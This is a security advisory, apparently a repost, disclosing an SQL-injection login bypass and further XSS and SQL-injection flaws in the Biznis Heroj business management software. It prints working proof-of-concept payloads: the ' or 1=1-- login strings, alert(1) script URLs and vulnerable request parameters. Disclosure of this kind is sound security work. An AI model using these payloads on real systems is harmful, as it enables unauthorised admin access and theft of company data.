Infoproject Biznis Heroj (login.php) 验证绕过

作者: Infoproject DOO

Product web page: http://www.biznisheroj.mk

Affected version: Plus, Pro and Extra

 

Summary: Biznis Heroj or Business Hero (Áèçíèñ Õåðî¼) is the first

software on the Macedonian market that will help you manage your

business processes in your company, such as accounting, production,

acquisition, archiving, inventory, and the Cloud. Using the Cloud

technology, Biznis Heroj allows you to access the system from any

computer at any time through any internet browser.

 

Desc: The vulnerability is caused due to an error in the logon

authentication script (login.php) and can be exploited to bypass

the login procedure by defining the 'username' and 'password' POST

parameters with an SQL Injection attack, gaining admin privileges.

 

Tested on: Apache, PHP

 

 

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

                            liquidworm gmail com

 

测试示例:

 

https://www.2cto.com /login.php

 

Username: ' or 1=1--

Password: ' or 1=1--

 

 

Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities

 

 

Vendor: Infoproject DOO

Product web page: http://www.biznisheroj.mk

Affected version: Plus, Pro and Extra

 

Summary: Biznis Heroj or Business Hero  is the first

software on the Macedonian market that will help you manage your

business processes in your company, such as accounting, production,

acquisition, archiving, inventory, and the Cloud. Using the Cloud

technology, Biznis Heroj allows you to access the system from any

computer at any time through any internet browser.

 

Desc: Input passed via the parameters 'filter' in 'widget.dokumenti_lista.php'

and 'fin_nalog_id' in 'nalozi_naslov.php' script are not properly sanitised

before being returned to the user or used in SQL queries. This can be exploited

to manipulate SQL queries by injecting arbitrary SQL code. The param 'config'

in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to a XSS

issue where the attacker can execute arbitrary HTML and script code in a user's

browser session in context of an affected site.

 

Tested on: Apache, PHP

 

 

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

                            liquidworm gmail com

  

 

XSS:

 

https://www.2cto.com /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1);

https://www.2cto.com /widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1

 

 

SQLi:

 

- POST https://www.2cto.com /widgets/widget.dokumenti_lista.php

 

action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen&

bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1&

magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML&

dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML&

dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML&

dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA&

order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc &

filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=&

limit=50&widget=1

 

 

- GET https://www.2cto.com /prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default